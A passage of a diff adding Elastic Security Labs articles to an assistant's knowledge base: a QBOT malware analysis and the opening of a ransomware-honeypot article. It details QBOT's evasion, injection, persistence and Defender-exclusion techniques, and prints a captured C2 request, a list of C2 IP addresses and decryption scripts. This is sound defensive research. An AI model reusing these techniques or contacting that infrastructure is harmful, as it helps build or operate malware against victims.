+QBOT is a multistage, multiprocess binary that has capabilities for evading detection, escalating privileges, configuring persistence, and communicating with C2 through a set of IP addresses. The C2 can update QBOT, upload new IP addresses, upload and run fileless binaries, and execute shell commands.
+
+As a result of this analysis, MARE has produced a new yara rule based on the core component of QBOT as well as a static configuration extractor able to extract and decrypt its strings, its configuration, and its C2 IP address list.
+
+> For information on the QBOT configuration extractor and malware analysis, check out our blog posts detailing this:
+>
+> - [QBOT Configuration Extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor)
+> - [QBOT Attack Pattern](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)
+
+## Execution flow
+
+This section describes the QBOT execution flow in the following three stages:
+
+- First Stage: Initialization
+- Second Stage: Installation
+- Third Stage: Communication
+
+### Stage 1
+
+![First stage execution flow](/assets/images/qbot-malware-analysis/1qbot.png)
+
+The sample is executed with the **regsvr32.exe** binary, which in turn will call QBOT’s **DllRegisterServer** export:
+
+![regsvr32.exe loading QBOT and calling its DllRegisterServer export.](/assets/images/qbot-malware-analysis/2qbot.png)
+
+After execution, QBOT checks if it’s running under the Windows Defender sandbox by checking the existence of a specific subdirectory titled: **C:\\INTERNAL\\\_\_empty** , if this folder exists, the malware terminates itself:
+
+![QBOT checking if it is running and Windows Defender sandbox.](/assets/images/qbot-malware-analysis/3qbot.jpg)
+
+The malware will then enumerate running processes to detect any antivirus (AV) products on the machine. The image below contains a list of AV vendors QBOT reacts to:
+
+![Enum of vendors QBOT can detect.](/assets/images/qbot-malware-analysis/4qbot.jpg)
+
+AV detection will not prevent QBOT from running. However, it will change its behavior in later stages. In order to generate a seed for its pseudorandom number generator (PRNG), QBOT generates a fingerprint of the computer by using the following expression:
+
+```
+**fingerprint = CRC32(computerName + CVolumeSerialNumber + AccountName)**
+```
+
+If the **“C:”** volume doesn’t exist the expression below is used instead:
+
+```
+**fingerprint = CRC32(computerName + AccountName)**
+```
+
+Finally, QBOT will choose a set of targets to inject into depending on the AVs previously detected and the machine architecture:
+
+|                            |                                                                                                               |
+| -------------------------- | ------------------------------------------------------------------------------------------------------------- | ---------------------- | ----------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------ |
+| AV detected & architecture | Targets                                                                                                       |
+| BitDefender                | Kaspersky                                                                                                     | Sophos                 | TrendMicro                                                                                                                    | & x86                                                                                                        | %SystemRoot%\\SysWOW64\\mobsync.exe %SystemRoot%\\SysWOW64\\explorer.exe |
+| BitDefender                | Kaspersky                                                                                                     | Sophos                 | TrendMicro & x64                                                                                                              | %SystemRoot%\\System32\\mobsync.exe%SystemRoot%\\explorer.exe%ProgramFiles%\\Internet Explorer\\iexplore.exe |
+| Avast                      | AVG                                                                                                           | Windows Defender & x86 | %SystemRoot%\\SysWOW64\\OneDriveSetup.exe%SystemRoot%\\SysWOW64\\msra.exe%ProgramFiles(x86)%\\Internet Explorer\\iexplore.exe |
+| Avast                      | AVG                                                                                                           | Windows Defender & x64 | %SystemRoot%\\System32\\OneDriveSetup.exe%SystemRoot%\\System32\\msra.exe                                                     |
+| x86                        | '%SystemRoot%\\explorer.exe%SystemRoot%\\System32\\msra.exe%SystemRoot%\\System32\\OneDriveSetup.exe          |
+| x64                        | %SystemRoot%\\SysWOW64\\explorer.exe%SystemRoot%\\SysWOW64\\msra.exe%SystemRoot%\\System32\\OneDriveSetup.exe |
+
+QBOT will try to inject itself iteratively, using its second stage as an entry point, into one of its targets– choosing the next target process if the injection fails. Below is an example of QBOT injecting into **explorer.exe**.
+
+![QBOT injecting itself into explorer.exe](/assets/images/qbot-malware-analysis/7qbot.png)
+
+### Stage 2
+
+![Second stage execution flow](/assets/images/qbot-malware-analysis/8qbot.png)
+
+QBOT begins its second stage by saving the content of its binary in memory and then corrupting the file on disk:
+
+![QBOT corrupting its binary file](/assets/images/qbot-malware-analysis/0.jpg)
+
+The malware then loads its configuration from one of its resource sections:
+
+![QBOT loading its configuration from resource](/assets/images/qbot-malware-analysis/10qbot.jpg)
+
+QBOT also has the capability to load its configuration from a **.cfg** file if available in the process root directory:
+
+![QBOT trying to load its configuration from a file](/assets/images/qbot-malware-analysis/1.jpg)
+
+After loading its configuration, QBOT proceeds to install itself on the machine– initially by writing its internal configuration to the registry:
+
+![QBOT writing its configuration to the registry](/assets/images/qbot-malware-analysis/2.jpg)
+
+Shortly after, QBOT creates a persistence subdirectory with a randomly-generated name under the **%APPDATA%\Microsoft** directory. This folder is used to drop the in-memory QBOT binary for persistence across reboot:
+
+![QBOT creating its persistence folder](/assets/images/qbot-malware-analysis/3.jpg)
+
+At this point, the folder will be empty because the malware will only drop the binary if a shutdown/reboot event is detected. This “contingency” binary will be deleted after reboot.
+
+QBOT will attempt the same install process for all users and try to either execute the malware within the user session if it exists, or create a value under the **CurrentVersion\Run** registry key for the targeted user to launch the malware at the next login. Our analysis didn’t manage to reproduce this behavior on an updated Windows 10 machine. The only artifact observed is the randomly generated persistence folder created under the user **%APPDATA%\Microsoft** directory:
+
+![Persistence folder is empty when QBOT is running](/assets/images/qbot-malware-analysis/4qbot.jpg)
+
+QBOT finishes its second stage by restoring the content of its corrupted binary and registering a task via **Schtask** to launch a QBOT service under the **NT AUTHORITY\SYSTEM** account.
+
+The first stage has a special execution path where it registers a service handler if the process is running under the **SYSTEM** account. The QBOT service then executes stages 2 and 3 as normal, corrupting the binary yet again and executing commands on behalf of other QBOT processes via messages received through a randomly generated named pipe:
+
+![QBOT running as SYSTEM service](/assets/images/qbot-malware-analysis/15qbot.png)
+
+### Stage 3
+
+![Third stage execution flow](/assets/images/qbot-malware-analysis/16qbot.png)
+
+QBOT begins its third stage by registering a window and console event handler to monitor suspend/resume and shutdown/reboot events. Monitoring these events enables the malware to install persistence dynamically by dropping a copy of the QBOT binary in the persistence folder and creating a value under the **CurrentVersion\Run** registry key:
+
+![QBOT install persistence when suspend/resume or shutdown/reboot event occurs](/assets/images/qbot-malware-analysis/7qbot.png)
+
+At reboot, QBOT will take care of deleting any persistence artifacts.
+
+The malware will proceed to creating a watchdog thread to monitor running processes against a hardcoded list of binaries every second. If any process matches, a registry value is set that will then change QBOT behavior to use randomly generated IP addresses instead of the real one, thus never reaching its command and control:
+
+|                                                                                                                                                                          |                                                                                                                                           |                                                                                                                                                                   |
+| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| frida-winjector-helper-32.exefrida-winjector-helper-64.exeTcpdump.exewindump.exeethereal.exewireshark.exeettercap.exertsniff.exepacketcapture.execapturenet.exeqak_proxy | dumpcap.exeCFF Explorer.exenot_rundll32.exeProcessHacker.exetcpview.exefilemon.exeprocmon.exeidaq64.exePETools.exeImportREC.exeLordPE.exe | SysInspector.exeproc_analyzer.exesysAnalyzer.exesniff_hit.exejoeboxcontrol.exejoeboxserver.exeResourceHacker.exex64dbg.exeFiddler.exesniff_hit.exesysAnalyzer.exe |
+
+QBOT will then load its domains from one of its **.rsrc** files and from the registry as every domain update received from its C2 will be part of its configuration written to the registry. See Extracted Network Infrastructure in Appendix A.
+
+Finally, the malware starts communicating with C2 via HTTP and TLS. The underlying protocol uses a JSON object encapsulated within an enciphered message which is then base64-encoded:
+
+![QBOT message format](/assets/images/qbot-malware-analysis/8qbot.png)
+
+Below an example of a HTTP POST request sent by QBOT to its C2:
+
+```
+Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
+Host: 181.118.183.98
+Content-Length: 77
+Cache-Control: no-cache
+
+qxlbjrbj=NnySaFAKLt+YgjH3UET8U6AUwT9Lg51z6zC+ufeAjt4amZAXkIyDup74MImUA4do4Q==
+```
+
+Through this communication channel, QBOT receives commands from C2 — see Appendix B (Command Handlers). Aside from management commands (update, configuration knobs), our sample only handles binary execution-related commands, but we know that the malware is modular and can be built with additional features like a VNC server, a reverse shell server, proxy support (to be part of the domains list), and numerous other capabilities are feasible.
+
+## Features
+
+### Mersenne Twister Random Number Generator
+
+QBOT uses an implementation of [Mersenne Twister Random Number Generator](https://www.sciencedirect.com/topics/computer-science/mersenne-twister) (MTRNG) to generate random values:
+
+![QBOT's Mersenne Twister Random Number Generator implementation](/assets/images/qbot-malware-analysis/19qbot.jpg)
+
+The MTRNG engine is then used by various functions to generate different types of data, for example for generating registry key values and persistence folders. As QBOT needs to reproduce values, it will almost always use the computer fingerprint and a “salt” specific to the value it wants to generate:
+
+![QBOT generating random event name with fixed seed and salt](/assets/images/qbot-malware-analysis/20qbot.jpg)
+
+### String obfuscation
+
+All QBOT strings are XOR-encrypted and concatenated in a single blob we call a “string bank”. To get a specific string the malware needs a string identifier (identifier being an offset in the string bank), a decryption key, and the targeted string bank.
+
+![GetStringAux function prototype.](/assets/images/qbot-malware-analysis/1qbot.png)
+
+As this sample has two string banks, it has four **GetString**' functions currying the string bank and the decryption key parameters: One C string function and one wide string function for each string bank. Wide string functions use the same string banks, but convert the data to **utf-16**.
+
+![QBOT calling GetString function](/assets/images/qbot-malware-analysis/2qbot.png)
+
+![GetString function currying GetStringAux with string bank and key parameters](/assets/images/qbot-malware-analysis/3qbot.jpg)
+
+See Appendix C (String Deciphering Implementation).
+
+### Import obfuscation
+
+QBOT resolves its imports using a hash table:
+
+![QBOT calling GetApi function](/assets/images/qbot-malware-analysis/4qbot.jpg)
+
+![GetApi function prototype](/assets/images/qbot-malware-analysis/25qbot.jpg)
+
+The malware resolves the library name through its GetString function and then resolves the hash table with a classic library’s exports via manual parsing, comparing each export to the expected hash. In this sample, the hashing comparison algorithm use this formula:
+
+```
+**CRC32(exportName) XOR 0x218fe95b == hash**
+```
+
+### Resource obfuscation
+
+The malware is embedded with different resources, the common ones are the configuration and the domains list. Resources are encrypted the same way: The decryption key may be either embedded within the data blob or provided. Once the resource is decrypted, an embedded hash is used to check data validity.
+
+![QBOT decrypting its resource with embedded or provided key](/assets/images/qbot-malware-analysis/26qbot.jpg)
+
+See Appendix D (Resource Deciphering Implementation).
+
+### Cyrillic keyboard language detection
+
+At different stages, QBOT will check if the computer uses a Cyrillic language keyboard. If it does, it prevents further execution.
+
+![Set of languages QBOT is looking to stop its execution](/assets/images/qbot-malware-analysis/7qbot.png)
+
+### AVG/AVAST special behavior
+
+AVG and Avast share the same antivirus engine. Thus if QBOT detects one of those antivirus running, it will also check at the installation stage if one of their DLLs is loaded within the malware memory space. If so, QBOT will skip the installation phase.
+
+![QBOT checking if AVG/AVAST has hooked its process](/assets/images/qbot-malware-analysis/8qbot.png)
+
+### Windows Defender special behavior
+
+If QBOT is running under **SYSTEM** account, it will add its persistence folder to the Windows Defender exclusion path in the registry. It will also do this for the legacy Microsoft Security Essential (MSE) exclusion path if detected.
+
+![QBOT adding its persistence folder to Windows Defender and MSE exclusion paths](/assets/images/qbot-malware-analysis/29qbot.jpg)
+
+### Exception list process watchdog
+
+Each second, QBOT parses running processes looking for one matching the hardcoded exception list. If any is found, a “fuse” value is set in the registry and the watchdog stops. If this fuse value is set, QBOT will not stop execution– but at the third stage, the malware will use randomly generated IP and won't be able to contact C2.
+
+![Watchdog thread setting fuse if any Exceptionlisted process is detected](/assets/images/qbot-malware-analysis/30qbot.jpg)
+
+![QBOT using randomly generated IP address if fuse is set]/assets/images/qbot-malware-analysis/1qbot.png)
+
+### QBOT process injection
+
+#### Second stage injection
+
+To inject its second stage into one of a hardcoded target, QBOT uses a classic **CreateProcess** , **WriteProcessMemory** , **ResumeProcess** DLL injection technique. The malware will create a process, allocate and write the QBOT binary within the process memory, write a copy of its engine, and patch the entry point to jump to a special function. This function performs a light initialization of QBOT and its engine within the new process environment, alerts the main process of its success, and then execute the second stage.
+
+![QBOT second stage injection]/assets/images/qbot-malware-analysis/2qbot.png)
+
+![QBOT injection entry point]/assets/images/qbot-malware-analysis/3qbot.jpg)
+
+#### Injecting library from command and control
+
+QBOT uses the aforementioned method to inject libraries received from C2. The difference is that as well as mapping itself, the malware will also map the received binary and use a library loader as entry point.
+
+![QBOT DLL loader injection]/assets/images/qbot-malware-analysis/4qbot.jpg)
+
+![QBOT Dll loader entrypoint](/assets/images/qbot-malware-analysis/35qbot.jpg)
+
+### Multi-user installation
+
+Part of the QBOT installation process is installing itself within others users’ accounts. To do so, the malware enumerates each user with an account on the machine (local and domain), then dumps its configuration under the user’s **Software\Microsoft** registry key, creates a persistence folder under the users’ **%APPDATA%\Microsoft** folder, and finally tries to either launch QBOT under the user session if the session exist, or else creates a run key to launch the malware when the user will log in.
+
+![QBOT installation & run for one user](/assets/images/qbot-malware-analysis/36qbot.jpg)
+
+### Dynamic persistence
+
+QBOT registers a window handler to monitor suspend/resume events. When they occur, the malware will install/uninstall persistence.
+
+![QBOT window handler registration]/assets/images/qbot-malware-analysis/7qbot.png)
+
+![QBOT window handler catching suspend/resume event]/assets/images/qbot-malware-analysis/8qbot.png)
+
+QBOT registers a console event to handle shutdown/reboot events as well.
+
+![QBOT registering console handler](/assets/images/qbot-malware-analysis/39qbot.jpg)
+
+![QBOT console handler catching shutdown/reboot event](/assets/images/qbot-malware-analysis/40qbot.jpg)
+
+### Command and control public key pinning
+
+QBOT has a mechanism to verify the signature of every message received from its command and control. The verification mechanism is based on a public key embedded in the sample. This public key could be used to identify the campaign the sample belongs to, but this mechanism may not always be present.
+
+![QBOT command and control message processing]/assets/images/qbot-malware-analysis/1qbot.png)
+
+![Message signature verification with hardcoded command and control public key]/assets/images/qbot-malware-analysis/2qbot.png)
+
+The public key comes from a hardcoded XOR-encrypted data blob.
+
+![Hardcoded command and control public key being XOR-decrypted]/assets/images/qbot-malware-analysis/3qbot.jpg)
+
+### Computer information gathering
+
+Part of QBOT communication with its command and control is sending information about the computer. Information are gathered through a set Windows API calls, shell commands and Windows Management Instrumentation (WMI) commands:
+
+![Computer information gathering 1/2]/assets/images/qbot-malware-analysis/4qbot.jpg)
+
+![Computer information gathering 2/2](/assets/images/qbot-malware-analysis/45qbot.jpg)
+
+One especially interesting procedure listed installed antivirus via WMI:
+
+![QBOT listing installed antivirus via a WMI command](/assets/images/qbot-malware-analysis/46qbot.jpg)
+
+### Update mechanism
+
+QBOT can receive updates from its command and control. The new binary will be written to disk, executed through a command line, and the main process will terminate.
+
+![QBOT writing to disk and running the updated binary]/assets/images/qbot-malware-analysis/7qbot.png)
+
+![QBOT stopping execution if update is running]/assets/images/qbot-malware-analysis/8qbot.png)
+
+### Process injection manager
+
+QBOT has a system to keep track of processes injected with binaries received from its command and control in order to manage them as the malware receives subsequent commands. It also has a way to serialize and save those binaries on disk in case it has to stop execution and recover execution when restarted.
+
+To do this bookkeeping, QBOT maintains two global structures — a list of all binaries received from its command and control, and a list of running injected processes:
+
+![QBOT’s list of DLL to inject received from its command and control.](/assets/images/qbot-malware-analysis/49qbot.jpg)
+
+![QBOT’s list of running injected processes](/assets/images/qbot-malware-analysis/50qbot.jpg)
+
+## Conclusion
+
+The QBOT malware family is highly active and still part of the threat landscape in 2022 due to its features and its powerful modular system. While initially characterized as an information stealer in 2007, this family has been leveraged as a delivery mechanism for additional malware and post-compromise activity.
+
+Elastic Security provides out-of-the-box prevention capabilities against this threat. Existing Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).
+
+## MITRE ATT&CK Tactics and Techniques
+
+MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- Tactic: [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)
+- Tactic: [Defense Evasion](https://attack.mitre.org/tactics/TA0005)
+- Tactic: [Discovery](https://attack.mitre.org/tactics/TA0007)
+- Tactic: [Command and Control](https://attack.mitre.org/tactics/TA0011)
+
+### Techniques / Sub Techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- Technique: [Process Injection](https://attack.mitre.org/techniques/T1055) (T1055)
+- Technique: [Modify Registry](https://attack.mitre.org/techniques/T1112) (T1112)
+- Technique: [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) (T1027)
+- Technique: [Obfuscated Files or Information: Indicator Removal from Tools](https://attack.mitre.org/techniques/T1027/005) (T1027.005)
+- Technique: [System Binary Proxy Execution: Regsvr32](https://attack.mitre.org/techniques/T1218/010) (T1218.010)  
+  Technique: [Application Window Discovery](https://attack.mitre.org/techniques/T1010) (T1010)
+- Technique: [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) (T1083)
+- Technique: [System Information Discovery](https://attack.mitre.org/techniques/T1082) (T1082)
+- Technique: [System Location Discovery](https://attack.mitre.org/techniques/T1614) (T1614)
+- Technique: [Software Discovery: Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) (T1518.001)
+- Technique: [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) (T1033)
+- Technique: [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001) (T1071.001)
+
+## Observations
+
+While not specific enough to be considered indicators of compromise, the following information was observed during analysis that can help when investigating suspicious events.
+
+### File System
+
+**Persistence folder**
+
+```
+**%APPDATA%\Microsoft\[Random Folder]**
+```
+
+**Example:**
+
+```
+**C:\Users\Arx\AppData\Roaming\Microsoft\Vuhys**
+```
+
+### Registry
+
+**Scan Exclusion**
+
+```
+**HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\[Persistence Folder]**
+```
+
+**Example:**
+
+```
+**HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Arx\AppData\Roaming\Microsoft\Blqgeaf**
+```
+
+### Configuration
+
+**Configuration**
+
+```
+**HKU\[User SID]\Software\Microsoft\[Random Key]\[Random Value 0]**
+```
+
+**Example:**
+
+```
+**HKU\S-1-5-21-2844492762-1358964462-3296191067-1000\Software\Microsoft\Silhmfua\28e2a7e8**
+```
+
+## Appendices
+
+### Appendix A (extracted network infrastructure)
+
+|                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |
+| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| 1.161.71.109:4431.161.71.109:995100.1.108.246:443101.50.103.193:995102.182.232.3:995103.107.113.120:443103.139.243.207:990103.246.242.202:443103.87.95.133:2222103.88.226.30:443105.226.83.196:995108.60.213.141:443109.12.111.14:443109.228.220.196:443113.11.89.165:995117.248.109.38:21120.150.218.241:995120.61.2.95:443121.74.167.191:995125.168.47.127:2222138.204.24.70:443140.82.49.12:443140.82.63.183:443140.82.63.183:995143.0.34.185:443144.202.2.175:443144.202.2.175:995144.202.3.39:443144.202.3.39:995148.64.96.100:443149.28.238.199:443149.28.238.199:995172.114.160.81:995172.115.177.204:2222173.174.216.62:443173.21.10.71:2222174.69.215.101:443175.145.235.37:443176.205.119.81:2078176.67.56.94:443176.88.238.122:995179.158.105.44:443180.129.102.214:995180.183.128.80:2222181.118.183.98:443181.208.248.227:443181.62.0.59:443182.191.92.203:995182.253.189.74:2222185.69.144.209:443 | 186.105.121.166:443187.102.135.142:2222187.207.48.194:61202187.250.114.15:443187.251.132.144:22190.252.242.69:443190.73.3.148:2222191.17.223.93:32101191.34.199.129:443191.99.191.28:443196.233.79.3:80197.167.62.14:993197.205.127.234:443197.89.108.252:4432.50.137.197:443201.145.189.252:443201.211.64.196:2222202.134.152.2:2222203.122.46.130:443208.107.221.224:443209.197.176.40:995217.128.122.65:2222217.164.210.192:443217.165.147.83:99324.178.196.158:222224.43.99.75:44331.35.28.29:44331.48.166.122:207832.221.224.140:99537.186.54.254:99537.34.253.233:44338.70.253.226:222239.41.158.185:99539.44.144.159:99539.52.75.201:99539.57.76.82:99540.134.246.185:99541.228.22.180:44341.230.62.211:99341.38.167.179:99541.84.237.10:99542.235.146.7:222245.241.232.25:99545.46.53.140:222245.63.1.12:44345.63.1.12:99545.76.167.26:44345.76.167.26:99545.9.20.200:44346.107.48.202:443 | 47.156.191.217:44347.180.172.159:44347.180.172.159:5001047.23.89.62:99347.23.89.62:9955.32.41.45:4435.95.58.211:208766.98.42.102:44367.209.195.198:44368.204.7.158:44370.46.220.114:44370.51.138.126:222271.13.93.154:222271.74.12.34:44372.12.115.90:2272.252.201.34:99572.76.94.99:44373.151.236.31:44373.67.152.98:222274.15.2.252:222275.113.214.234:222275.99.168.194:44375.99.168.194:6120176.169.147.192:3210376.25.142.196:44376.69.155.202:222276.70.9.169:222278.87.206.213:99580.11.74.81:222281.215.196.174:44382.152.39.39:44383.110.75.97:222284.241.8.23:3210385.246.82.244:44386.97.11.43:44386.98.208.214:222286.98.33.141:44386.98.33.141:99588.228.250.126:44389.211.181.64:222290.120.65.153:207891.177.173.10:99592.132.172.197:222293.48.80.198:99594.36.195.250:222294.59.138.62:119494.59.138.62:222296.21.251.127:222296.29.208.97:44396.37.113.36:993 |
+
+### Appendix B (command handlers)
+
+| Id   | Handler                                                                         |
+| ---- | ------------------------------------------------------------------------------- |
+| 0x1  | MARE::rpc::handler::CommunicateWithC2                                           |
+| 0x6  | MARE::rpc::handler::EnableGlobalRegistryConfigurationValuek0x14                 |
+| 0x7  | MARE::rpc::handler::DisableGlobalRegistryConfigurationValuek0x14                |
+| 0xa  | MARE::rpc::handler::KillProcess                                                 |
+| 0xc  | MARE::rpc::handler::SetBunchOfGlobalRegistryConfigurationValuesAndTriggerEvent1 |
+| 0xd  | MARE::rpc::handler::SetBunchOfGlobalRegistryConfigurationValuesAndTriggerEvent0 |
+| 0xe  | MARE::rpc::handler::DoEvasionMove                                               |
+| 0x12 | MARE::rpc::handler::NotImplemented                                              |
+| 0x13 | MARE::rpc::handler::UploadAndRunUpdatedQBOT0                                    |
+| 0x14 | MARE::rpc::handler::Unk0                                                        |
+| 0x15 | MARE::rpc::handler::Unk1                                                        |
+| 0x19 | MARE::rpc::handler::UploadAndExecuteBinary                                      |
+| 0x1A | MARE::rpc::handler::UploadAndInjectDll0                                         |
+| 0x1B | MARE::rpc::handler::DoInjectionFromDllToInjectByStr                             |
+| 0x1C | MARE::rpc::handler::KillInjectedProcessAndDisableDllToInject                    |
+| 0x1D | MARE::rpc::handler::Unk3                                                        |
+| 0x1E | MARE::rpc::handler::KillInjectedProcessAndDoInjectionAgainByStr                 |
+| 0x1F | MARE::rpc::handler::FastInjectdll                                               |
+| 0x21 | MARE::rpc::handler::ExecuteShellCmd                                             |
+| 0x23 | MARE::rpc::handler::UploadAndInjectDll1                                         |
+| 0x24 | MARE::rpc::handler::UploadAndRunUpdatedQBOT1                                    |
+| 0x25 | MARE::rpc::handler::SetValueToGlobalRegistryConfiguration                       |
+| 0x26 | MARE::rpc::handler::DeleteValueFromGlobalRegistryConfiguration                  |
+| 0x27 | MARE::rpc::handler::ExecutePowershellCmd                                        |
+| 0x28 | MARE::rpc::handler::UploadAndRunDllWithRegsvr32                                 |
+| 0x29 | MARE::rpc::handler::UploadAndRunDllWithRundll32                                 |
+
+### Appendix C (string deciphering implementation)
+
+```
+def decipher_strings(data: bytes, key: bytes) -> bytes:
+   result = dict()
+   current_index = 0
+   current_string = list()
+   for i in range(len(data)):
+       current_string.append(data[i] ^ key[i % len(key)])
+       if data[i] == key[i % len(key)]:
+              result[current_index] = bytes(current_string)
+              current_string = list()
+              current_index = i + 1
+   return result
+```
+
+### Appendix D (resource deciphering implementation)
+
+```
+from Crypto.Cipher import ARC4
+from Crypto.Hash import SHA1
+
+def decipher_data(data: bytes, key: bytes) -> tuple[bytes, bytes]:
+   data = ARC4.ARC4Cipher(SHA1.SHA1Hash(key).digest()).decrypt(data)
+   return data[20:], data[:20]
+
+
+def verify_hash(data: bytes, expected_hash: bytes) -> bool:
+   return SHA1.SHA1Hash(data).digest() == expected_hash
+
+
+def decipher_rsrc(rsrc: bytes, key: bytes) -> bytes:
+   deciphered_rsrc, expected_hash = decipher_data(rsrc[20:], rsrc[:20])
+   if not verify_hash(deciphered_rsrc, expected_hash):
+       deciphered_rsrc, expected_hash = decipher_data(rsrc, key)
+       if not verify_hash(deciphered_rsrc, expected_hash):
+              raise RuntimeError('Failed to decipher rsrc: Mismatching hashes.')
+   return deciphered_rsrc
+```
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ransomware_in_the_honeypot_how_we_capture_keys.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ransomware_in_the_honeypot_how_we_capture_keys.md
new file mode 100644
index 0000000000000..9bd869ea07fcc
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ransomware_in_the_honeypot_how_we_capture_keys.md
@@ -0,0 +1,377 @@
+---
+title: "Ransomware in the honeypot: how we capture keys with sticky canary files"
+slug: "ransomware-in-the-honeypot-how-we-capture-keys"
+date: "2024-02-23"
+description: "This article describes the process of capturing encryption keys from ransomware using Elastic Defend ransomware protection."
+author:
+  - slug: salim-bitam
+  - slug: christophe-alladoum
+image: "photo-edited-07.png"
+category:
+  - slug: security-research
+tags: 
+  - ransomware
+  - canary
+  - honeypot
+---
+
+## TL;DR
+
+![Source: https://twitter.com/DebugPrivilege/status/1716890625864564796](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image12.png)
+
+
+At Elastic, we have bi-annual ON Weeks, where engineers break into “hack-a-thon” teams to tackle a technical challenge voted on by the team. This article presents the outcome of [yet another](https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem) Elastic ON Week, where we delved into an innovative application of Elastic Endpoint ransomware protection. Our research used our existing ransomware canary protection, deployed since 7.14, to generate memory snapshots (i.e., data collections that record process information) of the process(es) identified as ransomware. Through analysis of these snapshots, our research illustrated how we could recover critical information for the forensics process and even encryption keys, allowing for complete decryption.
+
+This process memory snapshotting mechanism was added starting with Elastic Defend 8.11, allowing DFIR teams to find memory dumps of ransomware flagged by our ransomware protection, all within Elastic Endpoint’s secure installation folder (by default, ```$ElasticInstallPath\Endpoint\cache\RansomwareDumps```). 
+
+## Introduction
+
+In 2024, we don't need to explain what ransomware is or the multibillion-dollar industry it's become or explain how even companies with unlimited budgets struggle to contain or prevent it. These adversaries are mature and efficient, often outpacing security functions like forensic and malware analysis.
+
+### Current state of protection
+
+Thankfully, over the years, AVs/EDRs have become increasingly better at detecting and preventing ransomware. Among the most common existing mitigations, we find: 
+
+ - Static and dynamic detection by signatures: this is usually performed at various levels (through hashes at a file or ELF/PE section level) and file activity (write access to files with high entropy changes) has the advantage of being easily and rapidly implemented, but are also likely to generate false positives 
+ - Reverse engineering: Reversing binaries can expose new ways to interfere with execution, as malware authors implement OS-level fail-safes (for instance, through Mutant objects) and/or network fail-safes (like WANNACRY) 
+ - Recovery backups: These are not always thoroughly tested, and even if they’re working there is a risk of data loss between the last backup and the moment of infection 
+ - Shadow copies: Somewhat similar to recovery backups, ransomware usually actively locates and attempts to destroy them prior to encrypting files on a system 
+ - High entropy and rapid file change: This approach is purely experimental and attempts to detect drastic changes in the file content as an indicator of encryption, however, this is also very false positive (FP) prone
+ - Last cryptography weakness: By far the most complex mitigation, as it requires reverse engineering and cryptographic knowledge, but also luck as adversaries hope that the author rolls their own crypto API (see Elastic's Mark Mager [2019 DEFCON talk](https://youtu.be/0TF9NLsGCHA) for some examples); this approach can’t work against modern OS native cryptographic APIs as long as they’re properly implemented according to documentation
+
+### How ransomware (usually) works, and why it matters
+
+It is imperative that we know both what we're protecting against and how it internally operates to be effective. This diverse nature underlines that there may never be a universal solution to combat all ransomware strains. Understanding this diversity also emphasizes the importance of our technique, which provides significant insights about ransomware.
+
+From a high level, the sequence of actions that ransomware executes is usually summarized as such:
+
+ 1. **Delivery**: this can be done in several ways, from social engineering to 0-day/1-day vulnerability exploitation. This approach can also rely on weak passwords to remotely infect targets.
+ 2. **C2 Communication**: once the execution starts, the ransomware may communicate with the C2 to exchange configuration and share information about the victim. This step can also leave room for the C2 to have a kill switch in place, preventing further infection
+ 3. **Encryption**: after establishing a cryptographic context, the process recursively browses the file system, looks for files with specific extensions, and encrypts them.
